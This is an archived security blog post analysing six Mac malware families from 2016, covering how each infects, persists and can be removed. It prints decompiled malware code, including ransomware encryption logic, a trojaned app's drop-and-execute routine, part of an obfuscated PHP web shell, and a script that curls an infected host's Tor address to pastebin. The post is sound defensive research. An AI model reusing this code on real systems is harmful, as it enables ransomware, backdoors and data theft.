{ "id": "030b27a9-cac9-4f04-942c-f258f9f3f540", "created_at": "2026-04-06T03:36:28.377701Z", "updated_at": "2026-04-10T03:37:49.751381Z", "deleted_at": null, "sha1_hash": "0390b2659dd3307a0145bbf3a01baecb0c2219ef", "title": "Mac Malware of 2016", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2862560, "plain_text": "Mac Malware of 2016\r\nArchived: 2026-04-06 03:09:44 UTC\r\nMac Malware of 2016\r\n› a cumulative analysis of new OS X malware\r\n1/1/2017\r\nIntroduction\r\nDue to sheer volume, Windows malware generally dominates the malicious code and news scene. Of course, Macs\r\nare susceptible to malware as well and 2016 saw a handful of new malware targeting Apple computers.\r\nIn this blog, I wanted to discuss all Mac malware that appeared this year. While each sample has been reported on\r\nbefore (i.e. by the AV company that discovered it), this blog aims to cumulatively cover all in one place.\r\nMoreover, for each, we'll identify the infection vector, persistence mechanism, features/goals, and describe\r\ndisinfection.\r\nIf you want to play along, all samples can be downloaded from Objective-See's malware page.\r\nBy downloading the samples, you waive all rights to claim punitive, incidental and consequential damages\r\nresulting from mishandling or self-infection ;)\r\nAlso, the 'disinfection' instructions provided in this blog are specific to each malware specimen. Often malware\r\ncan install other malware, or allow an remote attacker to do what ever they want. Thus if you were/are infected by\r\nany of these samples, it's suggested you fully re-install OS X.\r\nI'm presenting a talk at RSA 2017 titled \"Meet and Greet with the macOS Malware Class of 2016\" In this talk I'll\r\ndive into the details of each of the malware specimens described here. In other words, think of this blog as a\r\npreview of my talk!\r\nHope to see you at RSA :)\r\nTimeline\r\nKeRanger\r\n3/2016\r\nThe first fully-functional, in-the-wild ransomware for OS X.\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 1 of 24\n\nEleanor\r\n7/2016\r\nA PHP-based backdoor that exposed infected computers as a hidden Tor service.\r\nKeydnap\r\n7/2016\r\nA standard backdoor for OS X with a propensity for stealing credentials, and used Tor for its\r\ncommunications.\r\nFake File Opener\r\n8/2016\r\nA rather annoying piece of adware, though it did have a unique persistence mechanism.\r\nMokes\r\n9/2016\r\nA fairly standard OS X backdoor, that did support a wide range of features.\r\nKomplex\r\n9/2016\r\nA Russian (APT 28/FancyBear) OS X implant, that provided remote 'administrative' capabilities.\r\nKeRanger\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 2 of 24\n\nKeRanger\r\nfound on: 3/2016\r\nfound by: PaloAlto Networks (report)\r\ninfection vector: infected application on developer's official website\r\nfeatures: encrypt user files for ransom\r\ndisinfection: reboot\r\nOSX/KeRanger is the first fully-functional, in-the-wild ransomware for OS X!\r\n› infection vector\r\nThis malware was unusual for a variety of reasons. First, its infection vector is somewhat (for Mac Malware)\r\nunique. In order to surreptitiously infect Mac users, the OSX/KeRanger authors hacked the official website for a\r\npopular OS X bittorrent application, 'Transmission'\r\nWith access to the website, the malware authors then infected the legitimate Transmission application with\r\nOSX/KeRanger. Specifically, they added a new mach-O binary to application bundle (General.rtf).\r\nThe main function of the Transmission.app was modified to execute this malware's binary:\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 3 of 24\n\n//build path to source (General.rtf)\r\n__sprintf_chk(pathSrc, 0x0, 0x400, \"%s/Resources/General.rtf\", ...);\r\n//build path to destination (kernel_service)\r\n__sprintf_chk(pathDest, 0x0, 0x400, \"%s/Library/kernel_service\", ...);\r\n//read in source file\r\nrbx = fopen(pathSrc, \"rb\");\r\nvar_1448 = fread(r12, 0x1, r13, rbx);\r\nfclose(rbx);\r\n//write it out to destination\r\nr14 = fopen(pathDest, \"wb+\");\r\nfwrite(r12, var_1448, 0x1, r14);\r\nfclose(r14);\r\n//set it to executable\r\nchmod(pathDest, 0x40);\r\n//launch it!\r\nsystem(pathDest);\r\nFinally the malware authors re-signed the (now) infected application so that GateKeeper (in its default settings)\r\nwould not prevent the malware from executing:\r\nThus, any time an unsuspecting user downloaded and executed the Transmission application (again, from the\r\nofficial Transmission website) the malware would compromise their Mac. Yikes!\r\n› persistence\r\nAs far as I know, OSX/KeRanger does not contain any logic nor code to persist itself. Thus if the user reboots\r\ntheir system, or kills the malware's process, kernel_service, the malware will not be restarted...unless the user re-runs the infected Transmission application.\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 4 of 24\n\n› features\r\nAnother unique aspect of OSX/KeRanger was its payload or goal. In short it attempted to encrypt for ransom, user\r\nfiles. Yes, OSX/KeRanger was the first, fully-functional in-the-wild piece of ransomware targeting Apple\r\ncomputers.\r\nReversing the malware reveals its ransomware logic:\r\n//encrypt /Users\r\nrecursive_task(\"/Users\", _encrypt_entry, _putReadme);\r\n//encrypt /Volumes\r\nrecursive_task(\"/Volumes\", _check_ext_encrypt, _putReadme);\r\n//build path to '.kernel_complete'\r\nsprintf_chk(0x0, 0x0, 0x400, \"%s/Library/.kernel_complete\"...);\r\n//write to file\r\nrbx = fopen(0x0, \"w\"); fwrite(\"do not touch this\\n\", 0x12, 0x1, rbx);\r\nAs shown in the pseudo-code snippet, OSX/KeRanger will encrypt all files under /Users/* as well as all files\r\nunder /Volumes that match certain extensions (PaloAlto Network's report noted about 300, including .docs, .jpgs,\r\n.zips, .cpp, etc).\r\nFor each directory where the ransomware encrypts files, it creates a plaintext 'read-me' file the contains\r\ninstructions to the user how to pay the ransom in order to recover their files:\r\nOne final, interesting aspect of OSX/KeRanger is that some researchers have convincingly claimed it is a rewrite\r\nor Mac version of the 'linux.encoder' ransomware. Their reasoning is quite compelling and seems to confirm that\r\noftentimes malware authors are quite keen on expanding their potential targets by porting the malicious creations\r\nto OS X.\r\n› disinfection\r\nSince (AFAIK) OSX/KeRanger does not persist, it is trivial to remove:\r\n1. kill the kernel_service process\r\n2. remove ~/Library/kernel_*\r\n3. upgrade to version 2.93+ of Transmission.app\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 5 of 24\n\nIt should be noted that currently Mac users should be protected anyways, as Apple revoked the signing certificate\r\n(ID Z7276PX673), as well as updated their XProtect signatures:\r\n$ cat /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist\r\n\u003cdict\u003e\r\n\u003ckey\u003eDescription\u003c/key\u003e\r\n\u003cstring\u003eOSX.KeRanger.A\u003c/string\u003e\r\n\u003ckey\u003eLaunchServices\u003c/key\u003e\r\n\u003cdict\u003e\r\n   \u003ckey\u003eLSItemContentType\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.application-bundle\u003c/string\u003e\r\n\u003c/dict\u003e\r\n\u003ckey\u003eMatches\u003c/key\u003e\r\n\u003carray\u003e\r\n   \u003cdict\u003e\r\n      \u003ckey\u003eMatchFile\u003c/key\u003e\r\n      \u003cdict\u003e\r\n         \u003ckey\u003eNSURLTypeIdentifierKey\u003c/key\u003e\r\n         \u003cstring\u003epublic.unix-executable\u003c/string\u003e\r\n      \u003c/dict\u003e\r\n      \u003ckey\u003ePattern\u003c/key\u003e\r\n      \u003cstring\u003e488DBDD0EFFFFFBE00000000BA0004000031C04989D8*31F6\r\n      4C89E7*83F8FF7457C785C4EBFFFF00000000\u003c/string\u003e\r\n   ...\r\nKeydnap\r\n Keydnap\r\nfound on: 7/2016\r\nfound by: ESET (report)\r\ninfection vector: infected application on developer's official website\r\nfeatures: backdoor \u0026 credential stealer\r\ndisinfection: remove launch agents\r\nOSX/Keynap is fairly standard backdoor for OS X with a propensity for stealing credentials, and uses Tor for its\r\ncommunications.\r\n› infection vector\r\nThe original infection vector for OSX/Keynap was never discovered. Eset states that, \"It is still not clear how\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 6 of 24\n\nvictims are initially exposed to OSX/Keydnap. It could be through attachments in spam messages, downloads from\r\nuntrusted websites...\"\r\nWhat is known is that it was distributed in a zip archive which contained a binary named screenshot.jpg . Since\r\nthe filename contained a space at its end (i.e. \".jpg \") when a user double-clicked it, it would be executed by\r\nTerminal.app. In other words, the malware would be run.\r\nLater, it was discovered that the official Transmission website (transmissionbt.com), was hacked again 🙄 ...this\r\ntime, to distribute Keydnap. Just as they had with OSX/KeRanger, the malware authors infected the legitimate\r\nTransmission application, by adding an extra binary (License.rtf) then modifying the application's code to execute\r\nit. The infected Transmission application was then (re)signed, with another stolen or fraudulently obtained Apple\r\ndeveloper ID: Shaderkin Igor (836QJ8VMCQ):\r\nThus for a time, any user that downloaded and ran Transmission.app would be infected with OSX/Keydnap.\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 7 of 24\n\n› persistence\r\nIn order to persist, OSX/Keydnap creates two launch agents, com.apple.iCloud.sync.daemon and\r\ncom.geticloud.icloud.photo:\r\nThe first launch agent plist (com.apple.iCloud.sync.daemon) tells the OS to execute a binary named icloudsyncd.\r\nThis binary is the backdoor component of the malware.\r\nThe second launch agent plist (com.geticloud.icloud.photo) contains a path to the malware's command and control\r\nmechanisms. Named icloudproc, this binary is simply a copy of Tor2Web proxy.\r\n› features\r\nAs mentioned, icloudsyncd is the main component of the malware. It provides 'standard' backdoor or remote\r\n'administrative' capabilities such ability to download and execute a file, including a python scripts:\r\n//exec downloaded python\r\nsprintf(var_430, \"/tmp/%s\", rbx);\r\nsprintf(var_830, \"python %s\", var_430);\r\nchmod(var_430, 0x1c0);\r\nsystem(var_830);\r\nOSX/Keydnap also contains logic to elevate its privileges, albeit in very unsophisticated method; just asking:\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 8 of 24\n\nPerhaps the most interesting feature of the malware, is its ability to dump credentials and other sensitive\r\ninformation from the keychain. It does this via code from the open-source keychaindump project. (note however,\r\nAFAIK, this would generate an \"icloudsyncd wants to access the keychain\" alert that the user would have to\r\nallow):\r\nOSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is\r\nautomatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component\r\n(icloudsyncd) uses this proxy for communication purposes: \"Keydnap is using the onion.to Tor2Web proxy over\r\nHTTPS to report back to its C\u0026C server.\"\r\nlea rdx, qword [0x10000bbe7] ; \"127.0.0.1:9050\"\r\nmov esi, 0x2714\r\nxor eax, eax\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 9 of 24\n\nmov rdi, rbx\r\ncall curl_easy_setopt\r\n› disinfection\r\nOSX/Keydnap can be removed from an infected system, via the following steps:\r\n1. Via the 'launchctl unload' command, unload the backdoor and Tor proxy\r\n2. Remove the launch agent plist files /Library/LaunchAgents or ~/Library/LaunchAgents\r\ncom.apple.iCloud.sync.daemon.plist and com.geticloud.icloud.photo.plist\r\n3. Remove the launch agent binaries \u0026 files:\r\na) ~/Library/Application Support/com.apple.iCloud.sync.daemon/\r\nb) ~/Library/Application Support/com.geticloud/\r\nApple has also revoked the Apple developer ID that was used to sign the infected Transmission application:\r\n$ spctl -a -t exec -vv Transmission.app\r\n/Volumes/Transmission/Transmission.app: CSSMERR_TP_CERT_REVOKED\r\nEleanor\r\n Eleanor\r\nfound on: 7/2016\r\nfound by: BitDefender (report)\r\ninfection vector: fake (trojaned) application\r\nfeatures: backdoor (php) with audio \u0026 video capture capabilities\r\ndisinfection: remove launch agent\r\nOSX/Eleanor is another basic, albeit 'feature-complete' backdoor (php) for Mac computers.\r\n› infection vector\r\nSimilar to other OS X malware of 2016, OSX/Eleanor was distributed in an applications via the internet.\r\nHowever, it appears that the malware authors simple (re)created an abandoned application (\"EasyDoc\r\nConvertor\"), as opposed to hacking the official website of a legitimate application.\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 10 of 24\n\nThe malicious, fake EasyDoc Convertor application was hosted on the popular app sharing website Mac Update.\r\nThus, any user that downloaded and ran this application would be infected with Eleanor.\r\n› persistence\r\nOSX/Eleanor installs three(!) launch agents in order to persist its various components. Obviously stealth was not\r\nsomething the malware authors cared about at all :P The three launch agents are:\r\n1. com.getdropbox.dropbox.integritycheck.plist → conn\r\n2. com.getdropbox.dropbox.timegrabber.plist → check_hostname\r\n3. com.getdropbox.dropbox.usercontent.plist → dbd\r\nmv $DIR/com.getdropbox.dropbox.usercontent.plist\r\n~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist\r\nlaunchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.usercontent.plist\r\nmv $DIR/com.getdropbox.dropbox.integritycheck.plist\r\n~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist\r\nlaunchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.integritycheck.plist\r\nmv $DIR/com.getdropbox.dropbox.timegrabber.plist\r\n~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist\r\nlaunchctl load ~/Library/LaunchAgents/com.getdropbox.dropbox.timegrabber.plist\r\nThe first launch agent, com.getdropbox.dropbox.integritycheck.plist, executes a binary name conn. This simply\r\nsets up a hidden Tor service. The second launch agent, com.getdropbox.dropbox.timegrabber.plist executes a bash\r\nscript name check_hostname. This script publishes name of the hidden Tor service to pastebin. The final launch\r\nagent,com.getdropbox.dropbox.usercontent.plist executes a binary named dbd, which is actually a copy of Apple's\r\nPHP binary:\r\n$ codesign -dvv ~/Library/.dropbox/dbd\r\n...\r\nIdentifier=com.apple.php\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 11 of 24\n\nAuthority=Software Signing\r\nAuthority=Apple Code Signing Certification Authority\r\nAuthority=Apple Root CA\r\n› features\r\nA rather unique feature of Eleanor is that it essentially turns an infected host into a remotely accessible hidden Tor\r\nservice. The command and control logic for this is implemented with the conn binary. Via Objective-See's\r\nTaskExplorer utility, it is easy to the malware listening on both port 9060 and 9061:\r\nThe malware gets these port values from one of its Tor configuration files, ~/Library/.dropbox/sync/storage:\r\n$ cat sync/storage\r\nGeoIPFile /Users/user/Library/.dropbox/sync/data/list\r\nGeoIPv6File /Users/user/Library/.dropbox/sync/data/list6\r\nHiddenServiceDir /Users/user/Library/.dropbox/sync/hs\r\nHiddenServicePort 80 127.0.0.1:9991\r\nHiddenServicePort 22 127.0.0.1:9992\r\nSOCKSPort 9060\r\nControlPort 9061\r\nThe malware also contains a bash script named check_hostname, which, as previously mentioned, is persisted as a\r\nlaunch agent. The purpose of this script is to encrypt the name (address) of the hidden Tor service that was setup\r\nby the first launch agent, and then publish that to pastebin. This of course allows the attacker to 'find' and connect\r\nto the infected host.\r\nencrypt tor name ('hostname')\r\ne.g. 'xjd6uzkuyonxzrz2.onion'\r\nHOSTNAME=$(cat /Users/$USER/Library/.dropbox/sync/hs/hostname | cut -d '.' -f 1 | openssl rsautl -encrypt -\r\npubin -inkey /Users/$USER/Library/.dropbox/public.key | openssl enc -base64 | sed \"s/\\+/PLUS/g\")\r\npost to pastebin\r\npastebin.com/api/api_post.php\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 12 of 24\n\nPASTEID=$(curl -sd\r\n\"api_paste_code=$HOSTNAME\u0026api_option=paste\u0026api_dev_key=d1e52e9d2452e1810279527aa1a83c8b\r\n\u0026api_paste_private=1\u0026api_user_key=df8a73a0813c422465564c913e760d87\"\r\n\"http://pastebin.com/api/api_post.php\" | cut -d \"/\" -f 4)\r\nThe core backdoor logic of OSX/Eleanor, is actually implemented in PHP - this is why the malware has a copy of\r\nApple's PHP binary. Specifically the malware contains a copy of the b374k shell (v 3.2.3) which is available\r\nonline at github.com/b374k.\r\n\u003c?php\r\n/*\r\n  b374k shell 3.2.3\r\n  Jayalah Indonesiaku\r\n  https://github.com/b374k/b374k\r\n*/\r\n$GLOBALS['pass'] = \"15bd408e435dc1a1509911cfd8c312f46ed54226\";\r\n$func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on\";$b374k=$func('$ ...\r\nThe PHP shell affords the attacker complete over an infected remote computer:\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 13 of 24\n\nTo further extend the features, or capabilities of the malware, it 'ships' with several utilities such as netcat and\r\nwacaw. The latter, wacaw, is available online where it is described as \"a little command-line tool for Mac OS X\r\nthat allows you to capture both still pictures and video from an attached camera\". Thus an attacker could record\r\nthe user of an infected Mac.\r\n› disinfection\r\nTo remove OSX/Eleanor from a system, simply unload then delete the three aforementioned launch agents.\r\nFollowing this, delete the 'hidden' ~/Library/.dropbox directory and the malicious EasyDoc Convertor application.\r\nApple has also updated XProtect with a signature to block Eleanor:\r\n$ cat /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist\r\n\u003ckey\u003eDescription\u003c/key\u003e\r\n\u003cstring\u003eOSX.Eleanor.A\u003c/string\u003e\r\n\u003ckey\u003eLaunchServices\u003c/key\u003e\r\n\u003cdict\u003e\r\n   \u003ckey\u003eLSItemContentType\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.application-bundle\u003c/string\u003e\r\n\u003c/dict\u003e\r\n\u003ckey\u003eMatches\u003c/key\u003e\r\n\u003carray\u003e\r\n   \u003cdict\u003e\r\n         \u003ckey\u003eMatchType\u003c/key\u003e\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 14 of 24\n\n\u003cstring\u003eMatchAny\u003c/string\u003e\r\n         \u003ckey\u003eMatches\u003c/key\u003e\r\n         \u003carray\u003e\r\n            \u003cdict\u003e\r\n            \u003ckey\u003eMatchFile\u003c/key\u003e\r\n            \u003cdict\u003e\r\n               \u003ckey\u003eNSURLTypeIdentifierKey\u003c/key\u003e\r\n               \u003cstring\u003epublic.unix-executable\u003c/string\u003e\r\n            \u003c/dict\u003e\r\n            \u003ckey\u003eMatchType\u003c/key\u003e\r\n            \u003cstring\u003eMatch\u003c/string\u003e\r\n            \u003ckey\u003eIdentity\u003c/key\u003e\r\n            \u003cdata\u003e3mQnUelrjFN0TwMab36SnVMiYyE=\u003c/data\u003e\r\n            \u003c/dict\u003e\r\n            \u003cdict\u003e\r\n            \u003ckey\u003eMatchFile\u003c/key\u003e\r\n            \u003cdict\u003e\r\n               \u003ckey\u003eNSURLTypeIdentifierKey\u003c/key\u003e\r\n               \u003cstring\u003epublic.unix-executable\u003c/string\u003e\r\n            \u003c/dict\u003e\r\n      ...\r\nFake File Opener\r\n Fake File Opener\r\nfound on: 8/2016\r\nfound by: MalwareBytes (report)\r\ninfection vector: fake ('security') popup\r\nfeatures: adware, adware installer\r\ndisinfection: delete application\r\nOSX/FakeFileOpener is a rather silly piece of adware, though it does have a unique persistence mechanism.\r\n› infection vector\r\nOSX/FakeFileOpener is installed along with other annoying OS X adware when a user is tricked into believing a\r\nfake security alert originating from 'AdvancedMacCleaner.com'\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 15 of 24\n\nIf the user clicks 'Install Security Upgrade Now' button and executes the downloaded adware installer package,\r\nthey will infect themselves. As the OSX/FakeFileOpener adware application, 'Mac File Opener.app' was signed,\r\nGatekeeper (in its default settings) would allow it to execute:\r\n› persistence\r\nThomas Reed (@thomasareed), the malware reverser who originally analyzed the sample noted that, \"even more\r\nintriguing, this app didn't have any apparent mechanism for being launched. It hadn't been added to my login\r\nitems. There wasn't a new launch agent or daemon designed to load it. It simply seemed to be sitting there, doing\r\nnothing.\"\r\nDigging deeper, he discovered that this malicious application (by means of its Info.plist file) registers itself as the\r\n'document handler' for a myriad of file types. In his words:\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 16 of 24\n\n\"Essentially, what this app had done is set itself up as an app that can open most files that are at all likely to be on\r\nthe typical user's system. Worse, if there is no other app to open a specific file, this app would be the default. It\r\nturns out that this is exactly what that app wants, and it takes full advantage of that fact.\"\r\nSince this mechanism requires a user launch an application that previously didn't have a default 'document\r\nhandler' and matches one that 'Mac File Opener' registered for, this is somewhat of a 'unreliable' persistence\r\nmechanism. However, the upside to this method is that it will 'bypass' tools such as BlockBlock that monitor for\r\ntrue persistence mechanisms (i.e. ones that require no user interaction, instead are automatically executed each\r\ntime the system is rebooted or the user logs in).\r\nIt's rare to find novel persistence mechanisms in OS X malware. As such, I previously dedicated an entire blog\r\npost, titled, \"Click File, App Opens\" that digs into the technical details of this persistence and how, at the OS level,\r\nsuch document handlers work.\r\n› features\r\nOSX/FakeFileOpenor is part of a fairly standard run-of-the-mill OS X adware package. It appears that its goal is\r\nsimply to get the user to install more adware. Specifically, whenever the Mac File Opener.app is launched (when\r\nthe user tries to open any file it has registered a document handler for), it will display a popup with a 'Search Web'\r\nbutton. If the user clicks this button, it will load www.macfileopener.org in a browser window.\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 17 of 24\n\nvoid -[AppDelegate searchWeb:]\r\n{\r\n  var_80 = [[@\"Adva\" stringByAppendingString:@\"nced Ma\"] stringByAppendingString:@\"c Cleaner\"];\r\n  var_88 = [[@\"Mac A\" stringByAppendingString:@\"dware C\"] stringByAppendingString:@\"leaner\"];\r\n  var_90 = [[@\"Mac Sp\" stringByAppendingString:@\"ace Re\"] stringByAppendingString:@\"viver\"];\r\n  var_98 = [[@\"Disk R\" stringByAppendingString:@\"evi\"] stringByAppendingString:@\"ver\"];\r\n  var_A0 = [[@\"Disk Cl\" stringByAppendingString:@\"eanu\"] stringByAppendingString:@\"p Pro\"];\r\n  ....\r\n  [[NSWorkspace sharedWorkspace] openURL:[NSURL URLWithString:[NSString\r\nstringWithFormat:@\"http://macfileopener.com/ ext/%@/?\r\namc=%@\u0026madc=%@\u0026msr=%@\u0026drv=%@\u0026dcp=%@\", [var_30 extension], var_58, var_60, var_68, var_70,\r\nvar_78]]];\r\nThis website will often display other adware-related popups and alerts to trick the user into downloading and\r\ninstalling even more malware. As Thomas Reed notes; \"these pages will download other junk PCVARK apps, such\r\nas Mac Adware Remover or Mac Space Reviver.\"\r\n› disinfection\r\nTo remove OSX/FakeFileOpenor, simply delete the Mac File Opener application. Behind the scenes this will\r\ncause the OS to also unregister its document handlers:\r\n# fs_usage -w -f filesystem | grep csstore\r\nrename com.apple.LaunchServices-134501.csstore~ lsd.31116\r\nopen com.apple.LaunchServices-134501.csstore lsd.31116\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 18 of 24\n\nWrData[AT2] com.apple.LaunchServices-134501.csstore lsd.31116\nWrData[AT2] com.apple.LaunchServices-134501.csstore lsd.31116\n$ /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework\n/Support/lsregister -dump | grep \"Mac File Opener\" | wc\n0 0 0\nMokes\n Mokes\nfound on: 9/2016\nfound by: Kaspersky (report)\ninfection vector: unknown\nfeatures: backdoor, with logic to capture; screen shots, audio, video, \u0026 keystrokes.\ndisinfection: delete launch agent\nWhile OSX/Mokes does support a wide range of features, at its core, it's still a fairly standard OS X backdoor.\n› infection vector\nHow user are become infected by OSX/Mokes is still unknown. Kaspersky, the AV company that discovered it,\nstated, \"...we can only speculate how this malware makes it to the victim machine. All vectors are possible:\nexploits, installation via another previously installed malware and of course via social engineering.\"\n› persistence\nLaunch Agents are the preferred method of persistence for OS X malware. OSX/Mokes conforms to this trend\ninstalling itself launch agent via the storeuserd.plist in ~/Library/LaunchAgents/. Looking at its disassembly, its\neasy to find the embedded template the malware uses for the launch agent:\nEkomsAutorun::service(void)::launchdContextTemplate\ndb '?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e',0Ah\ndb '',0Ah\ndb '',0Ah\ndb 9,'Label',0Ah\ndb 9,'%1',0Ah\ndb 9,'ProgramArguments',0Ah\ndb 9,'',0Ah\ndb 9,9,'%2',0Ah\ndb 9,'',0Ah\ndb 9,'RunAtLoad',0Ah\ndb 9,'',0Ah\ndb 9,'KeepAlive',0Ah\nhttps://objective-see.org/blog/blog_0x16.html\nPage 19 of 24\n\ndb 9,'',0Ah\ndb '',0Ah\ndb '',0Ah,0\n› features\nBesides basic features such as download and execute, OSX/Mokes supports a fairly wide range of other\ncapabilities as noted by Kaspersky: \"This malware...is able to steal various types of data from the victim’s\nmachine (Screenshots, Audio-/Video-Captures, Office-Documents, Keystrokes).\" One can confirm this by reversing\nthe malware's binary. For example, below are several hard-coded file search constants:\n0000001C unicode :/file-search\n0000000E unicode *.xlsx\n0000000C unicode *.xls\n0000000E unicode *.docx\n0000000C unicode *.doc\nThe malware also monitors for removable media (e.g. USB sticks). To record the user, the malware utilizes the\nQT. This cross-platform framework contains OS X-specific webcams recording code:\n//embedded QT methods\nAVFMediaRecorderControl::AVFMediaRecorderControl(AVFCameraService *,QObject *)\nAVFMediaRecorderControl::setState(QMediaRecorder::State)\nAVFMediaRecorderControl::setupSessionForCapture(void)\n//disassembly of 'setupSessionForCapture' method\nAVFMediaRecorderControl::setupSessionForCapture(void) proc\nhttps://objective-see.org/blog/blog_0x16.html\nPage 20 of 24\n\n...\r\n call AVFCameraSession::state(void)\r\n call AVFAudioInputSelectorControl::createCaptureDevice(void)\r\n lea rdx, \"Could not connect the video recorder\"\r\n ...\r\n call QMediaRecorderControl::error(int,QString const\u0026)\r\n› disinfection\r\nRemoving OSX/Mokes is a touch complex, as the malware may install itself into multiple locations. Once the\r\nmalware is detected though, simply unload its launch agent (e.g. launchctl unload\r\n~/Library/LaunchAgents/storeuserd.plist) then delete its binary (e.g. storeuserd).\r\nBesides the standard storeuserd name, the malware may install itself to:\r\n~/Library/com.apple.spotlight/SpotlightHelper\r\n~/Library/Dock/com.apple.dock.cache\r\n~/Library/Skype/SkypeHelper\r\n~/Library/Dropbox/DropboxCache\r\n~/Library/Google/Chrome/nacld\r\n~/Library/Firefox/Profiles/profiled\r\nKomplex\r\n Komplex\r\nfound on: 9/2016\r\nfound by: PaloAlto Networks (report)\r\ninfection vector: email\r\nfeatures: backdoor, with standard features\r\ndisinfection: delete launch agent\r\nRussian cyber-operations were a popular topic in 2016. OSX/Komplex is one of the Russian's (APT 28/Fancy\r\nBear's) OS X implants.\r\n› infection vector\r\nOSX/Komplex is a Mac application that is distributed via email (as an attachment). When executed, it will infect\r\nthe system, but also display an PDF document in a (lame) attempt to hide the infection. The antivirus company\r\nIntego, notes that:\r\n\"The person who receives the email may think they are opening a PDF file with future plans for the Russian\r\naerospace program, but in fact, it is a Trojan that will install files on the system and connect to a remote command\r\n\u0026 control (c\u0026c) server.\"\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 21 of 24\n\nLooking at the disassembly of the malware's main function shows the malware opening the embedded PDF, via\r\nthe Preview application:\r\nint main(int arg0, int arg1)\r\n{\r\n  var_38 = [NSSearchPathForDirectoriesInDomains(0xf, 0x1, 0x1) objectAtIndex:0x0];\r\n  var_48 = [NSString stringWithFormat:@\"SetFile -a E %@/roskosmos_2015-2025.pdf\", var_38];\r\n  var_50 = [NSString stringWithFormat:@\"rm -rf %@/roskosmos_2015-2025.app\", var_38];\r\n  var_58 = [NSString stringWithFormat:@\"open -a Preview.app %@/roskosmos_2015-2025.pdf\", var_38];\r\n   system([var_50 UTF8String]);\r\n  system([var_48 UTF8String]);\r\n  system([var_58 UTF8String]);\r\n› persistence\r\nHow does this malware persist? If you guessed launch agent, you are right! OSX/Komplex persists via\r\n~/Library/LaunchAgents/com.apple.updates.plist. This persistent launch agent plist, points to a malware's binary\r\nwhich is located in /Users/Shared/.local/kextd.\r\n$ cat ~/Library/LaunchAgents/com.apple.updates.plist\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003cplist version=\"1.0\"\u003e\r\n\u003cdict\u003e\r\n   \u003ckey\u003eLabel\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.updates\u003c/string\u003e\r\n   \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n   \u003carray\u003e\r\n      \u003cstring\u003e/Users/Shared/.local/kextd\u003c/string\u003e\r\n   \u003c/array\u003e\r\n   \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 22 of 24\n\n...\n› features\nWhen executed, OSX/Komplex first checks if it is being debugged or executed on a system that is not connected\nto the internet:\nint main(int argc, char* argv[])\n{\n if ((AmIBeingDebugged() \u0026 0x1) == 0x0)\n {\n while ((connectedToInternet() \u0026 0x1 \u0026 0x1) == 0x0)\n {\n sleep(0x3c);\n }\n rax = sub_100005b40();\n }\n else\n {\n remove(*argv);\n rax = 0x0;\n }\n return rax;\n}\nOSX/Komplex implements only few basic features. However, these are sufficient to allow a remote attacker to\ncompletely control an infected host. These features include:\ndownload a file\ndelete a file\nconfigure the backdoor\nexecuting a file\nexecuting a shell command\n$ nm Komplex | c++filt -p -i | grep File\n0000000100001e60 T FileExplorer::executeFile(char const*, unsigned long)\n0000000100001b90 T FileExplorer::getFileName()\n0000000100001b70 T FileExplorer::setFileName(char*)\n0000000100001e00 T FileExplorer::setParameters(char*)\n0000000100001bd0 T FileExplorer::executeShellCommand()\n0000000100001e20 T FileExplorer::setRemove()\nhttps://objective-see.org/blog/blog_0x16.html\nPage 23 of 24\n\nBesides the Russia connection, OSX/Komplex is rather interesting as the PaloAlto researchers note it may have\r\nactually been spotted before. In 2015, BAE systems released a report title \"New Mac OS Malware Exploits\r\nMackeeper.\" In this report they describe a new (unnamed) piece of malware that exploited a remote vulnerability\r\nin the infamous MacKeeper software in order to infect Mac users. The PaloAlto researchers noted a lot of similar\r\ncode, leading them to state, \"these overlaps suggest that the Trojan delivered by the MacKeeper vulnerability was\r\nin fact the Komplex Trojan.\"\r\n› disinfection\r\nIt is trivial to remove OSX/Komplex. First simply unload the malware's launch agent\r\n(~/Library/LaunchAgents/com.apple.updates.plist). Then delete both the launch agent plist and binary:\r\n$ launchctl unload ~/Library/LaunchAgents/com.apple.updates.plist\r\n$ rm ~/Library/LaunchAgents/com.apple.updates.plist\r\n$ rm /Users/Shared/.local/kextd\r\nConclusion\r\nWell that's a wrap! In this blog we discussed (all?) Mac malware that emerged in 2016. Hopefully 2017 will bring\r\nus lots of new malware to play with :)\r\nSource: 